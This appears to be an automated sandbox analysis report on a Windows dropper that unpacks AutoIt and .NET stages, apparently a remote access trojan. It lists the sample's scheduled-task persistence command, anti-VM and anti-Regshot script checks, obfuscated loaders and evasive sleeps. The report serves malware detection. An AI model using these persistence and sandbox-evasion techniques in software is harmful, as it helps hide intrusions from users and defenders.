Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp

Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096F640 push ecx; ret	0_2_0096F653
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096EB78 push eax; ret	0_2_0096EB96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002A0332 push edi; ret	7_2_002A0333
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270E06 push ecx; ret	7_2_00270E19
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026DBFE push eax; iretd	7_2_0026DC01
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026DBFC push cs; iretd	7_2_0026DBFD

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_00255D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

7_2_00255D78

PE file contains sections with non-standard names

Source: P05jmXYKpr.exe

Static PE information: section name: .didat

File is packed with WinRar

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5537109

Jump to behavior

Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release

Drops PE files

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002E25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		7_2_002E25A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		7_2_0026FC8A

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM autoit script

Source: Yara match

File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: boaliim.dat, 00000007.00000002.429505208.00000000017EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXESD
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXE
Source: boaliim.dat, 00000007.00000003.428295579.000000000182F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424245020.000000000182B000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.000000000182C000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.428339663.0000000001831000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425049143.000000000182E000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENH

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516	Thread sleep count: 64 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516	Thread sleep count: 186 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516	Thread sleep count: 125 > 30	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 8036	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 9709	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 423	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 491	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

API coverage: 5.9 %

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

API call chain: ExitProcess graph end node

Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe+
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exej
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: boaliim.dat, 00000007.00000003.427785381.0000000001872000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.427822290.0000000001875000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VBoxTray.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then1Q
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then?\|
Source: boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then1Qg
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VboxService.exe
Source: boaliim.dat, 00000007.00000003.427989410.0000000001824000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424225057.0000000001822000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: RegSvcs.exe, 0000000D.00000002.634072543.0000000001C08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If ProcessExists("VBoxTray.exe") Then

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096E6A3 VirtualQuery,GetSystemInfo,

0_2_0096E6A3

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0095A69B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0096C220
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097B348 FindFirstFileExA,	0_2_0097B348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	7_2_002BE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_002BD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_002CA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	7_2_002CA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C65F1 FindFirstFileW,FindNextFileW,FindClose,	7_2_002C65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028C642 FindFirstFileExW,	7_2_0028C642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C7248 FindFirstFileW,FindClose,	7_2_002C7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	7_2_002C72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_002BDB69

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

